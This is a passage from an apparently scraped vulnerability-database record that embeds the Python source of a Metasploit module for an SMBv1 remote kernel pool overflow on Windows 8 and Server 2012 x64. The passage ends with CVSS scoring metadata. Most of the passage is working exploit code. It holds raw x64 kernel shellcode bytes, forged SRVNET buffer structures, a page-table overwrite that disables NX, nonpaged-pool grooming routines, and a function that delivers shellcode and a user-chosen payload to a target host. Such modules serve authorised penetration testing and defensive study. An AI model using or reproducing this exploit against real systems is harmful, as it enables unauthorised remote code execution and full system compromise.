'\\x03\\x83\\xc7\\x08\\x48\\x8d\\x34\\x19\\xe8\\xf4\\x00\\x00\\x00\\x3d' + proc_hash +\n '\\x74\\x10\\x3d' + proc_hash + '\\x74\\x09\\x48\\x8b\\x0c' \n '\\x39\\x48\\x29\\xf9\\xeb\\xe0\\xbf\\x48\\xb8\\x18\\xb8\\xe8\\x84\\x00\\x00'\n '\\x00\\x48\\x89\\x45\\xf0\\x48\\x8d\\x34\\x11\\x48\\x89\\xf3\\x48\\x8b\\x5b'\n 
'\\x08\\x48\\x39\\xde\\x74\\xf7\\x4a\\x8d\\x14\\x33\\xbf\\x3e\\x4c\\xf8\\xce'\n '\\xe8\\x69\\x00\\x00\\x00\\x8b\\x40\\x03\\x48\\x83\\x7c\\x02\\xf8\\x00\\x74'\n '\\xde\\x48\\x8d\\x4d\\x10\\x4d\\x31\\xc0\\x4c\\x8d\\x0d\\xa9\\x00\\x00\\x00'\n '\\x55\\x6a\\x01\\x55\\x41\\x50\\x48\\x83\\xec\\x20\\xbf\\xc4\\x5c\\x19\\x6d'\n '\\xe8\\x35\\x00\\x00\\x00\\x48\\x8d\\x4d\\x10\\x4d\\x31\\xc9\\xbf\\x34\\x46'\n '\\xcc\\xaf\\xe8\\x24\\x00\\x00\\x00\\x48\\x83\\xc4\\x40\\x85\\xc0\\x74\\xa3'\n '\\x48\\x8b\\x45\\x20\\x80\\x78\\x1a\\x01\\x74\\x09\\x48\\x89\\x00\\x48\\x89'\n '\\x40\\x08\\xeb\\x90\\x58\\x5b\\x5e\\x5f\\x41\\x5e\\x41\\x5f\\xc3\\xe8\\x02'\n '\\x00\\x00\\x00\\xff\\xe0\\x53\\x51\\x56\\x41\\x8b\\x47\\x3c\\x41\\x8b\\x84'\n '\\x07\\x88\\x00\\x00\\x00\\x4c\\x01\\xf8\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20'\n '\\x4c\\x01\\xfb\\xff\\xc9\\x8b\\x34\\x8b\\x4c\\x01\\xfe\\xe8\\x1f\\x00\\x00'\n '\\x00\\x39\\xf8\\x75\\xef\\x58\\x8b\\x58\\x24\\x4c\\x01\\xfb\\x66\\x8b\\x0c'\n '\\x4b\\x8b\\x58\\x1c\\x4c\\x01\\xfb\\x8b\\x04\\x8b\\x4c\\x01\\xf8\\x5e\\x59'\n '\\x5b\\xc3\\x52\\x31\\xc0\\x99\\xac\\xc1\\xca\\x0d\\x01\\xc2\\x85\\xc0\\x75'\n '\\xf6\\x92\\x5a\\xc3\\x55\\x53\\x57\\x56\\x41\\x57\\x49\\x8b\\x28\\x4c\\x8b'\n '\\x7d\\x08\\x52\\x5e\\x4c\\x89\\xcb\\x31\\xc0\\x44\\x0f\\x22\\xc0\\x48\\x89'\n '\\x02\\x89\\xc1\\x48\\xf7\\xd1\\x49\\x89\\xc0\\xb0\\x40\\x50\\xc1\\xe0\\x06'\n '\\x50\\x49\\x89\\x01\\x48\\x83\\xec\\x20\\xbf\\xea\\x99\\x6e\\x57\\xe8\\x65'\n '\\xff\\xff\\xff\\x48\\x83\\xc4\\x30\\x85\\xc0\\x75\\x45\\x48\\x8b\\x3e\\x48'\n '\\x8d\\x35\\x4d\\x00\\x00\\x00\\xb9\\x00\\x06\\x00\\x00\\xf3\\xa4\\x48\\x8b'\n '\\x45\\xf0\\x48\\x8b\\x40\\x18\\x48\\x8b\\x40\\x20\\x48\\x8b\\x00\\x66\\x83'\n '\\x78\\x48\\x18\\x75\\xf6\\x48\\x8b\\x50\\x50\\x81\\x7a\\x0c\\x33\\x00\\x32'\n '\\x00\\x75\\xe9\\x4c\\x8b\\x78\\x20\\xbf\\x5e\\x51\\x5e\\x83\\xe8\\x22\\xff'\n '\\xff\\xff\\x48\\x89\\x03\\x31\\xc9\\x88\\x4d\\xf8\\xb1\\x01\\x44\\x0f\\x22'\n '\\xc1\\x41\\x5f\\x5e\\x5f\\x5b\\x5d\\xc3\\x48\\x92\\x31\\xc9\\x51\\x51\\x49'\n 
'\\x89\\xc9\\x4c\\x8d\\x05\\x0d\\x00\\x00\\x00\\x89\\xca\\x48\\x83\\xec\\x20'\n '\\xff\\xd0\\x48\\x83\\xc4\\x30\\xc3'\n )\n\n# because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000\nNTFEA_SIZE = 0x9000\n\nntfea9000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x260 # with these fea, ntfea size is 0x1c80\nntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\\x00'*0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c\nntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\\x00'*0x8148 # overflow to SRVNET_BUFFER_HDR\n\n'''\nReverse from srvnet.sys (Win2012 R2 x64)\n- SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete():\n\n// size 0x90\nstruct SRVNET_BUFFER_HDR {\n LIST_ENTRY list;\n USHORT flag; // 2 least significant bit MUST be clear. if 0x1 is set, pmdl pointers are access. if 0x2 is set, go to lookaside.\n char unknown0[6];\n char *pNetRawBuffer; // MUST point to valid address (check if this request is \"\\xfdSMB\")\n DWORD netRawBufferSize; // offset: 0x20\n DWORD ioStatusInfo;\n DWORD thisNonPagedPoolSize; // will be 0x82e8 for netRawBufferSize 0x8100\n DWORD pad2;\n char *thisNonPagedPoolAddr; // 0x30 points to SRVNET_BUFFER\n PMDL pmdl1; // point at offset 0x90 from this struct\n DWORD nByteProcessed; // 0x40\n char unknown4[4];\n QWORD smbMsgSize; // MUST be modified to size of all recv data\n PMDL pmdl2; // 0x50: if want to free corrupted buffer, need to set to valid address\n QWORD pSrvNetWskStruct; // want to change to fake struct address\n DWORD unknown6; // 0x60\n char unknown7[12];\n char unknown8[0x20];\n};\n\nstruct SRVNET_BUFFER {\n char transportHeader[80]; // 0x50\n char buffer[reqSize+padding]; // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000)\n SRVNET_BUFFER_HDR hdr; //some header size 0x90\n //MDL mdl1; // target\n};\n\nIn Windows 8, the srvnet buffer metadata is declared after real buffer. 
We need to overflow through whole receive buffer.\nBecause transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and\n DataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST.\nSo the possible srvnet buffer pool size is 0x82f0. With this pool size, we need to overflow more than 0x8150 bytes.\nIf exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to crash because of big overflow.\n'''\n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing\n# Here is the important fields on x64\n# - offset 0x18 (VOID*) : pointer to received SMB message buffer. This value MUST be valid address because there is\n# a check in SrvNetWskTransformedReceiveComplete() if this message starts with \"\\xfdSMB\".\n# - offset 0x48 (QWORD) : the SMB message length from packet header (first 4 bytes).\n# This value MUST be exactly same as the number of bytes we send.\n# Normally, this value is 0x80 + len(fake_struct) + len(shellcode)\n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.\n# The value MUST point to valid (might be fake) struct.\n# - offset 0x90 (MDL) : MDL for describe receiving SMB request buffer\n# - 0x90 (VOID*) : MDL.Next should be NULL\n# - 0x98 (USHORT) : MDL.Size should be some value that not too small\n# - 0x9a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)\n# - 0x90 (VOID*) : MDL.Process should be NULL\n# - 0x98 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. 
Controlling this value get arbitrary write.\n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).\n#\n#\n# To free the corrupted srvnet buffer (not necessary), shellcode MUST modify some memory value to satisfy condition.\n# Here is related field for freeing corrupted buffer\n# - offset 0x10 (USHORT): 2 least significant bit MUST be clear. Just set to 0xfff0\n# - offset 0x30 (VOID*) : MUST be fixed to correct value in shellcode. This is the value that passed to ExFreePoolWithTag()\n# - offset 0x40 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0\n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to\n# your shellcode as function argument\n# - offset 0x50 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set\n# The last condition is your shellcode MUST return non-negative value. The easiest way to do is \"xor eax,eax\" before \"ret\".\n# Here is x64 assembly code for setting nByteProcessed field\n# - fetch SRVNET_BUFFER address from function argument\n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40]\n# - fix pool pointer (rcx is -0x8150 because of fake_recv_struct below)\n# \\x48\\x01\\xd1 add rcx, rdx\n# \\x48\\x89\\x4a\\x30 mov [rdx+0x30], rcx\n# - set nByteProcessed for trigger free after return\n# \\x8b\\x4a\\x48 mov ecx, [rdx+0x48]\n# \\x89\\x4a\\x40 mov [rdx+0x40], ecx\n\n# debug mode affects HAL heap. 
The 0xffffffffffd04000 address should be useable no matter what debug mode is.\n# The 0xffffffffffd00000 address should be useable when debug mode is not enabled\n# The 0xffffffffffd01000 address should be useable when debug mode is enabled\nTARGET_HAL_HEAP_ADDR = 0xffffffffffd04000 # for put fake struct and shellcode\n\n# Note: feaList will be created after knowing shellcode size.\n\n# feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa\n# PTE of 0xffffffffffd00000 is at 0xfffff6ffffffe800\n# NX bit is at PTE_ADDR+7\n# MappedSystemVa = PTE_ADDR+7 - 0x7f\nSHELLCODE_PAGE_ADDR = (TARGET_HAL_HEAP_ADDR + 0x400) & 0xfffffffffffff000\nPTE_ADDR = 0xfffff6ffffffe800 + 8*((SHELLCODE_PAGE_ADDR-0xffffffffffd00000) >> 12)\nfakeSrvNetBufferX64Nx = '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR) # _, _, pointer to fake struct\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, PTE_ADDR+7-0x7f) # MDL.Process, MDL.MappedSystemVa\n\nfeaListNx = pack('<I', 0x10000)\nfeaListNx += ntfea9000\nfeaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\\x00' is for name\n# stop copying by invalid flag (can be any value except 0 and 0x80)\nfeaListNx += pack('<BBH', 0x12, 0x34, 0x5678)\n\n\ndef createFakeSrvNetBuffer(sc_size):\n # 0x180 is size of fakeSrvNetBufferX64\n totalRecvSize = 0x80 + 0x180 + sc_size\n fakeSrvNetBufferX64 = '\\x00'*16\n fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) # flag, _, _, pNetRawBuffer\n fakeSrvNetBufferX64 += pack('<QII', 0, 
0x82e8, 0) # _, thisNonPagedPoolSize, _\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize) # offset 0x40\n fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR) # pmdl2, pointer to fake struct\n fakeSrvNetBufferX64 += pack('<QQ', 0, 0)\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\n fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80) # MDL.Process, MDL.MappedSystemVa\n return fakeSrvNetBufferX64\n\ndef createFeaList(sc_size):\n feaList = pack('<I', 0x10000)\n feaList += ntfea9000\n fakeSrvNetBuf = createFakeSrvNetBuffer(sc_size)\n feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\\x00' is for name\n # stop copying by invalid flag (can be any value except 0 and 0x80)\n feaList += pack('<BBH', 0x12, 0x34, 0x5678)\n return feaList\n\n# fake struct for SrvNetWskTransformedReceiveComplete() and SrvNetCommonReceiveHandler()\n# x64: fake struct is at ffffffff ffd00e00\n# offset 0x50: KSPIN_LOCK\n# offset 0x58: LIST_ENTRY must be valid address. 
cannot be NULL.\n# offset 0x110: array of pointer to function\n# offset 0x13c: set to 3 (DWORD) for invoking ptr to function\n# some useful offset\n# offset 0x120: arg1 when invoking ptr to function\n# offset 0x128: arg2 when invoking ptr to function\n#\n# code path to get code exection after this struct is controlled\n# SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr\nfake_recv_struct = ('\\x00'*16)*5\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60\nfake_recv_struct += ('\\x00'*16)*10\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0) # offset 0x110: fn_ptr array\nfake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150\nfake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130\nfake_recv_struct += ('\\x00'*16)*3\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180) # shellcode address\n\n\ndef getNTStatus(self):\n return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']\nif not dependencies_missing:\n setattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus)\n\ndef sendEcho(conn, tid, data):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)\n transCommand['Parameters'] = smb.SMBEcho_Parameters()\n transCommand['Data'] = smb.SMBEcho_Data()\n\n transCommand['Parameters']['EchoCount'] = 1\n transCommand['Data']['Data'] = data\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('got good ECHO response')\n else:\n module.log('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')\n\n\n# override SMB.neg_session() to allow forcing ntlm authentication\nif not dependencies_missing:\n class MYSMB(smb.SMB):\n def __init__(self, remote_host, port, use_ntlmv2=True):\n self.__use_ntlmv2 
= use_ntlmv2\n smb.SMB.__init__(self, remote_host, remote_host, sess_port = port)\n\n def neg_session(self, extended_security = True, negPacket = None):\n smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)\n\ndef createSessionAllocNonPaged(target, port, size, username, password):\n conn = MYSMB(target, port, use_ntlmv2=False) # with this negotiation, FLAGS2_EXTENDED_SECURITY is not set\n _, flags2 = conn.get_flags()\n # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16\n if size >= 0xffff:\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\n reqSize = size // 2\n else:\n flags2 |= smb.SMB.FLAGS2_UNICODE\n reqSize = size\n conn.set_flags(flags2=flags2)\n\n pkt = smb.NewSMBPacket()\n\n sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)\n sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()\n\n sessionSetup['Parameters']['MaxBufferSize'] = 61440 # can be any value greater than response size\n sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value\n sessionSetup['Parameters']['VcNumber'] = 2 # any non-zero\n sessionSetup['Parameters']['SessionKey'] = 0\n sessionSetup['Parameters']['SecurityBlobLength'] = 0 # this is OEMPasswordLen field in another format. 
0 for NULL session\n sessionSetup['Parameters']['Capabilities'] = smb.SMB.CAP_EXTENDED_SECURITY | smb.SMB.CAP_USE_NT_ERRORS\n\n sessionSetup['Data'] = pack('<H', reqSize) + '\\x00'*20\n pkt.addCommand(sessionSetup)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('SMB1 session setup allocate nonpaged pool success')\n return conn\n\n if username:\n # Try login with valid user because anonymous user might get access denied on Windows Server 2012.\n # Note: If target allows only NTLMv2 authentication, the login will always fail.\n # support only ascii because I am lazy to implement Unicode (need pad for alignment and converting username to utf-16)\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\n reqSize = size // 2\n conn.set_flags(flags2=flags2)\n\n # new SMB packet to reset flags\n pkt = smb.NewSMBPacket()\n pwd_unicode = conn.get_ntlmv1_response(ntlm.compute_nthash(password))\n # UnicodePasswordLen field is in Reserved for extended security format.\n sessionSetup['Parameters']['Reserved'] = len(pwd_unicode)\n sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(username)) + pwd_unicode + username + '\\x00'*16\n pkt.addCommand(sessionSetup)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('SMB1 session setup allocate nonpaged pool success')\n return conn\n\n # lazy to check error code, just print fail message\n module.log('SMB1 session setup allocate nonpaged pool failed', 'error')\n sys.exit(1)\n\n\n# Note: impacket-0.9.15 struct has no ParameterDisplacement\n############# SMB_COM_TRANSACTION2_SECONDARY (0x33)\nif not dependencies_missing:\n class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):\n structure = (\n ('TotalParameterCount', '<H=0'),\n ('TotalDataCount', '<H'),\n ('ParameterCount', '<H=0'),\n ('ParameterOffset', '<H=0'),\n ('ParameterDisplacement', '<H=0'),\n ('DataCount', '<H'),\n ('DataOffset', '<H'),\n ('DataDisplacement', '<H=0'),\n 
('FID', '<H=0'),\n )\n\ndef send_trans2_second(conn, tid, data, displacement):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n # assume no params\n\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)\n transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()\n transCommand['Data'] = smb.SMBTransaction2Secondary_Data()\n\n transCommand['Parameters']['TotalParameterCount'] = 0\n transCommand['Parameters']['TotalDataCount'] = len(data)\n\n fixedOffset = 32+3+18\n transCommand['Data']['Pad1'] = ''\n\n transCommand['Parameters']['ParameterCount'] = 0\n transCommand['Parameters']['ParameterOffset'] = 0\n\n if len(data) > 0:\n pad2Len = (4 - fixedOffset % 4) % 4\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\n else:\n transCommand['Data']['Pad2'] = ''\n pad2Len = 0\n\n transCommand['Parameters']['DataCount'] = len(data)\n transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len\n transCommand['Parameters']['DataDisplacement'] = displacement\n\n transCommand['Data']['Trans_Parameters'] = ''\n transCommand['Data']['Trans_Data'] = data\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n\n\ndef send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n command = pack('<H', setup)\n\n # Use SMB_COM_NT_TRANSACT because we need to send data >65535 bytes to trigger the bug.\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)\n transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()\n transCommand['Parameters']['MaxSetupCount'] = 1\n transCommand['Parameters']['MaxParameterCount'] = len(param)\n transCommand['Parameters']['MaxDataCount'] = 0\n transCommand['Data'] = smb.SMBTransaction2_Data()\n\n transCommand['Parameters']['Setup'] = command\n transCommand['Parameters']['TotalParameterCount'] = len(param)\n transCommand['Parameters']['TotalDataCount'] = len(data)\n\n fixedOffset = 32+3+38 + len(command)\n if len(param) > 0:\n padLen 
= (4 - fixedOffset % 4 ) % 4\n padBytes = '\\xFF' * padLen\n transCommand['Data']['Pad1'] = padBytes\n else:\n transCommand['Data']['Pad1'] = ''\n padLen = 0\n\n transCommand['Parameters']['ParameterCount'] = len(param)\n transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen\n\n if len(data) > 0:\n pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\n else:\n transCommand['Data']['Pad2'] = ''\n pad2Len = 0\n\n transCommand['Parameters']['DataCount'] = firstDataFragmentSize\n transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len\n\n transCommand['Data']['Trans_Parameters'] = param\n transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB() # must be success\n if recvPkt.getNTStatus() == 0:\n module.log('got good NT Trans response')\n else:\n module.log('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')\n sys.exit(1)\n\n # Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data\n i = firstDataFragmentSize\n while i < len(data):\n sendSize = min(4096, len(data) - i)\n if len(data) - i <= 4096:\n if not sendLastChunk:\n break\n send_trans2_second(conn, tid, data[i:i+sendSize], i)\n i += sendSize\n\n if sendLastChunk:\n conn.recvSMB()\n return i\n\n\n# connect to target and send a large nbss size with data 0x80 bytes\n# this method is for allocating big nonpaged pool on target\ndef createConnectionWithBigSMBFirst80(target, port, for_nx=False):\n sk = socket.create_connection((target, port))\n pkt = '\\x00' + '\\x00' + pack('>H', 0x8100)\n # There is no need to be SMB2 because we want the target free the corrupted buffer.\n # Also this is invalid SMB2 message.\n # I believe NSA exploit use SMB2 for hiding alert from IDS\n #pkt += '\\xfeSMB' # smb2\n # it can be anything even it is invalid\n pkt += 'BAAD' # can be any\n if 
for_nx:\n # MUST set no delay because 1 byte MUST be sent immediately\n sk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n pkt += '\\x00'*0x7b # another byte will be sent later to disabling NX\n else:\n pkt += '\\x00'*0x7c\n sk.send(pkt)\n return sk\n\n\ndef _exploit(target, port, feaList, shellcode, numGroomConn, username, password):\n # force using smb.SMB for SMB1\n conn = smb.SMB(target, target, sess_port = port)\n conn.login(username, password)\n server_os = conn.get_server_os()\n module.log('Target OS: '+server_os)\n if server_os.startswith(\"Windows 10 \"):\n build = int(server_os.split()[-1])\n if build >= 14393: # version 1607\n module.log('This exploit does not support this build: {} >= 14393'.format(build), 'error')\n sys.exit(1)\n elif not (server_os.startswith(\"Windows 8\") or server_os.startswith(\"Windows Server 2012 \")):\n module.log('This exploit does not support this target: {}'.format(server_os), 'error')\n sys.exit(1)\n\n tid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\n\n # The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.\n # Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment\n progress = send_big_trans2(conn, tid, 0, feaList, '\\x00'*30, len(feaList)%4096, False)\n\n # Another TRANS2_OPEN2 (0) with special feaList for disabling NX\n nxconn = smb.SMB(target, target, sess_port = port)\n nxconn.login(username, password)\n nxtid = nxconn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\n nxprogress = send_big_trans2(nxconn, nxtid, 0, feaListNx, '\\x00'*30, len(feaList)%4096, False)\n\n # create some big buffer at server\n # this buffer MUST NOT be big enough for overflown buffer\n allocConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE - 0x2010, username, password)\n\n # groom nonpaged pool\n # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one\n srvnetConn = []\n 
for i in range(numGroomConn):\n sk = createConnectionWithBigSMBFirst80(target, port, for_nx=True)\n srvnetConn.append(sk)\n\n # create buffer size NTFEA_SIZE at server\n # this buffer will be replaced by overflown buffer\n holeConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE-0x10, username, password)\n # disconnect allocConn to free buffer\n # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer\n allocConn.get_socket().close()\n\n # hope one of srvnetConn is next to holeConn\n for i in range(5):\n sk = createConnectionWithBigSMBFirst80(target, port, for_nx=True)\n srvnetConn.append(sk)\n\n # remove holeConn to create hole for fea buffer\n holeConn.get_socket().close()\n\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\n # first trigger, overwrite srvnet buffer struct for disabling NX\n send_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress)\n recvPkt = nxconn.recvSMB()\n retStatus = recvPkt.getNTStatus()\n if retStatus == 0xc000000d:\n module.log('good response status for nx: INVALID_PARAMETER')\n else:\n module.log('bad response status for nx: 0x{:08x}'.format(retStatus), 'error')\n\n # one of srvnetConn struct header should be modified\n # send '\\x00' to disable nx\n for sk in srvnetConn:\n sk.send('\\x00')\n\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\n # second trigger, place fake struct and shellcode\n send_trans2_second(conn, tid, feaList[progress:], progress)\n recvPkt = conn.recvSMB()\n retStatus = recvPkt.getNTStatus()\n if retStatus == 0xc000000d:\n module.log('good response status: INVALID_PARAMETER')\n else:\n module.log('bad response status: 0x{:08x}'.format(retStatus), 'error')\n\n # one of srvnetConn struct header should be modified\n # a corrupted buffer will write recv data in designed memory address\n for sk in srvnetConn:\n sk.send(fake_recv_struct + shellcode)\n\n # execute 
shellcode\n for sk in srvnetConn:\n sk.close()\n\n # nicely close connection (no need for exploit)\n nxconn.disconnect_tree(tid)\n nxconn.logoff()\n nxconn.get_socket().close()\n conn.disconnect_tree(tid)\n conn.logoff()\n conn.get_socket().close()\n\n\ndef exploit(args):\n if dependencies_missing:\n module.log('Module dependencies (impacket) missing, cannot continue', 'error')\n sys.exit(1)\n\n # XXX: Normalize strings to ints and unset options to empty strings\n rport = int(args['RPORT'])\n numGroomConn = int(args['GroomAllocations'])\n smbuser = args['SMBUser'] if 'SMBUser' in args else ''\n smbpass = args['SMBPass'] if 'SMBPass' in args else ''\n\n # XXX: JSON-RPC requires UTF-8, so we Base64-encode the binary payload\n sc = eternalblue_kshellcode_x64(args['ProcessName']) + b64decode(args['payload_encoded'])\n\n if len(sc) > 0xe80:\n module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')\n sys.exit(1)\n\n # Now, shellcode is known. 
create a feaList\n feaList = createFeaList(len(sc))\n\n module.log('shellcode size: {:d}'.format(len(sc)))\n module.log('numGroomConn: {:d}'.format(numGroomConn))\n\n try:\n _exploit(args['RHOST'], rport, feaList, sc, numGroomConn, smbuser, smbpass)\n # XXX: Catch everything until we know better\n except Exception as e:\n module.log(str(e), 'error')\n sys.exit(1)\n\n module.log('done')\n\n\nif __name__ == '__main__':\n module.run(metadata, exploit)\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": 
